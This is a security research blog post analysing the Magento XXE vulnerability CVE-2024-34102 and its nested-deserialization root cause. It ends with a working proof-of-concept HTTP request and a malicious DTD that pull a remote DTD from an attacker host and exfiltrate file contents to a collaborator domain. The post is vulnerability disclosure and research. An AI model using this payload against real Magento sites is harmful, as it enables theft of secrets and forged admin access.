Research Notes
June 26, 2024

Why nested deserialization is harmful: Magento XXE (CVE-2024-34102)

No items found.
Creative Commons license

Magento is one of the most popular e-commerce solutions in use on the internet. It's estimated that there are over 140,000 instances of Magento running as of late 2023. Adobe's most recent advisory for Adobe Commerce / Magento, published on June 11th, 2024 highlighted a critical, pre-authentication XML entity injection issue (CVE-2024-34102) which Adobe rated as CVSS 9.8.

It was quite surprising to us that no public proof-of-concept existed at the time of us reading the advisory. Given the criticality of this issue and in order to provide customers of our Attack Surface Management Platform certainty around the exploitability of this issue, our security research team developed a proof-of-concept, well before our customers could be exploited by malicious actors.

We believe that the vulnerability is severe is due to the following reasons:

- It is possible to exfiltrate the <span class="code_single-line">app/etc/env.php</span> file from Magento, which contains a cryptographic key used to sign JWTs used for authentication. An attacker can craft an administrator JWT and abuse Magento's APIs as an admin user on affected installations.

- The vulnerability can be chained with recent research in PHP filter chains leading to RCE through the CVE-2024-2961 exploit, credit to Charles Fol.

- The broader impacts of XXE (any local file or remote URL's contents can be exfiltrated).

We want to acknowledge the original author for his excellent work on discovering this vulnerability, Sergey Temnikov. Shortly after this vulnerability was dubbed "CosmicString" by SanSec, he released a limited write-up of the issue, which discusses his methodology in discovering this issue but does not reveal the proof of concept. We highly recommend reading this write-up as he explains Magento's internal deserialization process and its inherent dangers.

As we tracked the public knowledge of this vulnerability, we found that SanSec's original emergency mitigation could be bypassed, and Sergey's first iteration of the "fixed" mitigation could also be bypassed. This led to both SanSec and Sergey updating their emergency hotfix mitigations over time.

This was interesting to observe as it highlighted the importance and effectiveness of peer review when it comes to emergency hot fixes and an argument for why disclosing the technical details of a vulnerability is important for the broader security industry.

To understand the key differences between an unpatched version of Magento and a patched one, we downloaded the packages <span class="code_single-line">magento2-2.4.7.zip</span> (unpatched) and <span class="code_single-line">magento2-2.4.7-p1.zip</span> (patched) from the Magneto GitHub repository. Extracting these and then running DiffMerge on these two directories revealed a very important clue to discovering this vulnerability:

Changes added to 2.4.7-p1

With the information that was publicly available, i.e., SanSec's first patch (blocking <span class="code_single-line">dataIsURL</span> inside the POST body) as well as the diff we can see in the image above, it was clear to us that this vulnerability was to do with instantiating a <span class="code_single-line">SimpleXMLElement</span>. PHP's documentation for this class revealed that <span class="code_single-line">dataIsURL</span> is an argument that can be passed to the <span class="code_single-line">SimpleXMLElement</span> constructor, which allows for loading XML from external sources.

The additional updates to the hotfix from Sergey revealed that you could not rely on blocking <span class="code_single-line">dataIsURL</span> as the vulnerability was exploitable without this, and his mitigation focused on blocking the keyword <span class="code_single-line">sourceData</span>.

With all of this information, we spent most of our time setting up a development environment for Magento and then searching for a deserialization gadget that would lead us to the instantiation of a <span class="code_single-line">SimpleXMLElement</span> with controllable arguments.

When it comes to complex deserialization issues, we highly suggest setting up a development environment with the ability to debug the code by setting breakpoints. For Magento 2, we utilized the following repo to bootstrap our development efforts. This docker image includes XDebug and is already configured for PhpStorm. After spinning up this docker image, we were able to install & seed Magento with sample data using the following commands:

./scripts/composer create-project --repository-url=https://repo.magento.com/ magento/project-community-edition=2.4.7 /home/magento # 2.4.7 is the vulnerable version
./scripts/magento setup:install --base-url=http://magento2.test/ --db-host=mysql --db-name=magento_db --db-user=magento_user --db-password="PASSWD#" --admin-firstname=admin --admin-lastname=admin --admin-email=admin@admin.test --admin-user=admin --admin-password=admin1! --language=en_US --currency=USD --timezone=America/Chicago --use-rewrites=1 --search-engine opensearch --opensearch-host=opensearch --opensearch-port=9200
./scripts/magento sampledata:deploy
./scripts/magento setup:upgrade

When searching through the Magento 2 code base for <span class="code_single-line">Simplexml\\Element.*sourceData</span>, we identified the following locations that could be viable targets:

~/Downloads/magento2-2.4.7/app/code/Magento/Quote/Model/Quote/Address/Total/Collector.php:
   70       * @param \Magento\Store\Model\StoreManagerInterface $storeManager
   71       * @param \Magento\Quote\Model\Quote\Address\TotalFactory $totalFactory
   72:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   73       * @param mixed $store
   74       * @param SerializerInterface $serializer

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Config/Ordered.php:
   84       * @param \Psr\Log\LoggerInterface $logger
   85       * @param \Magento\Sales\Model\Config $salesConfig
   86:      * @param \Magento\Framework\Simplexml\Element $sourceData
   87       * @param SerializerInterface $serializer
   88       */

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Order/Total/Config/Base.php:
   44       * @param \Magento\Sales\Model\Config $salesConfig
   45       * @param \Magento\Sales\Model\Order\TotalFactory $orderTotalFactory
   46:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   47       * @param SerializerInterface $serializer
   48       */

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/Base.php:
   19  
   20      /**
   21:      * @param \Magento\Framework\Simplexml\Element|string $sourceData $sourceData
   22       */
   23      public function __construct($sourceData = null)

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/BaseFactory.php:
   26       * Create config model
   27       *
   28:      * @param string|\Magento\Framework\Simplexml\Element $sourceData
   29       * @return \Magento\Framework\App\Config\Base
   30       */

From this list, we believed the most likely candidate that could be reached without authentication would be <span class="code_single-line">Magento/Quote/Model/Quote/Address/Total/Collector.php</span>. We found that reading through the code itself for how the nesting worked and allowed for the instantiation of <span class="code_single-line">sourceData</span> was not obvious.

To make further headway, it was necessary for us to understand at a high level how the input deserialization works. For that, we looked at <span class="code_single-line">magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php</span> and its <span class="code_single-line">_createFromArray</span> method:

        $data = is_array($data) ? $data : [];
        // convert to string directly to avoid situations when $className is object
        // which implements __toString method like \ReflectionObject
        $className = (string) $className;
        $class = new ClassReflection($className);
        if (is_subclass_of($className, self::EXTENSION_ATTRIBUTES_TYPE)) {
            $className = substr($className, 0, -strlen('Interface'));
        }

        // Primary method: assign to constructor parameters
        $constructorArgs = $this->getConstructorData($className, $data);
        $object = $this->objectManager->create($className, $constructorArgs);

        // Secondary method: fallback to setter methods
        foreach ($data as $propertyName => $value) {
            // ... SNIP ...

At a high level, if Magento is parsing some input data and expects a field <span class="code_single-line">address</span> that contains an <span class="code_single-line">\Magento\Quote\Api\Data\Address</span>, what it will do is the following:

- First, if the fields of the JSON match any of the names of the variables in the constructor of the class, pass that field as an argument;

- Second, if the name doesn't match, instead look for a method on the class named <span class="code_single-line">set</span> plus the field.

For example, if you passed the following JSON to the <span class="code_single-line">/rest/all/V1/guest-carts/test/estimate-shipping-methods</span> endpoint:

{
    "address": {
        "data": [1, 2, 3],
        "BaseShippingAmount" : 123
    }
}

- The field <span class="code_single-line">data</span> is in the constructor of the <span class="code_single-line">Address</span> class as <span class="code_single-line">array $data = []</span>, so it will be passed there.

- The <span class="code_single-line">Address</span> class has a method <span class="code_single-line">setBaseShippingAmount</span>, so after the class is instantiated it will call <span class="code_single-line">->setBaseShippingAmount(123)</span>.

The danger comes from the fact that this is done recursively: if either the constructor or the setter takes a non-primitive type, such as another class, then the deserialization process is done recursively on that field. Looking at the constructor for the <span class="code_single-line">Address</span> class, is has 37 parameters, and it's clear the Magento developers did not intend for you to be able to instantiate all of these:

    public function __construct(
        Context $context,
        Registry $registry,
        ExtensionAttributesFactory $extensionFactory,
        AttributeValueFactory $customAttributeFactory,
        Data $directoryData,
        \Magento\Eav\Model\Config $eavConfig,
        \Magento\Customer\Model\Address\Config $addressConfig,
        RegionFactory $regionFactory,
        CountryFactory $countryFactory,
        AddressMetadataInterface $metadataService,
        AddressInterfaceFactory $addressDataFactory,
        RegionInterfaceFactory $regionDataFactory,
        DataObjectHelper $dataObjectHelper,
        ScopeConfigInterface $scopeConfig,
        \Magento\Quote\Model\Quote\Address\ItemFactory $addressItemFactory,
        \Magento\Quote\Model\ResourceModel\Quote\Address\Item\CollectionFactory $itemCollectionFactory,
        RateFactory $addressRateFactory,
        RateCollectorInterfaceFactory $rateCollector,
        CollectionFactory $rateCollectionFactory,
        RateRequestFactory $rateRequestFactory,
        CollectorFactory $totalCollectorFactory,
        TotalFactory $addressTotalFactory,
        Copy $objectCopyService,
        CarrierFactoryInterface $carrierFactory,
        Address\Validator $validator,
        Mapper $addressMapper,
        Address\CustomAttributeListInterface $attributeList,
        TotalsCollector $totalsCollector,
        TotalsReader $totalsReader,
        AbstractResource $resource = null,
        AbstractDb $resourceCollection = null,
        array $data = [],
        Json $serializer = null,
        StoreManagerInterface $storeManager = null,
        ?CompositeValidator $compositeValidator = null,
        ?CountryModelsCache $countryModelsCache = null,
        ?RegionModelsCache $regionModelsCache = null,
    ) {

This provides a huge surface for bugs. By traversing chains of constructors and setters, it is possible to instantiate a wide variety of internal classes that were never meant to be user-facing. And if any of those constructors or setters do dangerous things, such as in the case of <span class="code_single-line">SimpleXMLElement</span>, this could lead to a security vulnerability. Further details on how to map out the pre-authentication endpoints and corresponding models can be found in Sergey's write up.

The goal is now to find a chain of types in constructors that allow us to reach one of the <span class="code_single-line">Simplexml</span> sinks identified earlier. Rather than trace the constructor manually for each class, we added the following line to <span class="code_single-line">magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php</span>:

private function getConstructorData(string $className, array $data): array
    {
        $preferenceClass = $this->config->getPreference($className);
        $class = new ClassReflection($preferenceClass ?: $className);

        try {
            $constructor = $class->getMethod('__construct');
        } catch (\ReflectionException $e) {
            $constructor = null;
        }

        if ($constructor === null) {
            return [];
        }

        $res = [];
        $parameters = $constructor->getParameters();
++      var_dump($parameters);

This simple <span class="code_single-line">var_dump</span> helped us to quickly understand all of the different parameters we could provide when calling the unauthenticated REST APIs based on the magic deserialisation logic that Magento had built.

We found that the pre-authentication endpoint <span class="code_single-line">/rest/all/V1/guest-carts/test/estimate-shipping-methods</span> mentioned earlier was likely the best candidate to reach <span class="code_single-line">sourceData</span> through reading the names of the constructor elements.

Debugging the available parameters was made easier with our <span class="code_single-line">var_dump</span> call, allowing us to quickly iterate on our payload with output as seen below:

  object(Laminas\Code\Reflection\ParameterReflection)#1176 (2) {
    ["name"]=>
    string(21) "totalCollectorFactory"
    ["isFromMethod":protected]=>
    bool(false)
  }

With further experimentation, we were able to develop the following payload, which instantiated a <span class="code_single-line">SimpleXMLElement</span> with controllable arguments via the <span class="code_single-line">sourceData</span> parameter:

POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
Host: example.com
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json
Content-Length: 274

{
  "address": {
    "totalsReader": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://your_ip:9999/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
            "options": 16
          }
        }
      }
    }
  }
}

With our DTD containing:

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://collabid.oastify.com/dtd.xml?%data;'>">

This resulted in the following:

Sweet, success!


Written by:
Adam Kues
Shubham Shah
Your subscription could not be saved. Please try again.
Your subscription has been successful.

Get updates on our research

Subscribe to our newsletter and stay updated on the newest research, security advisories, and more!

Ready to get started?

Get on a call with our team and learn how Assetnote can change the way you secure your attack surface. We'll set you up with a trial instance so you can see the impact for yourself.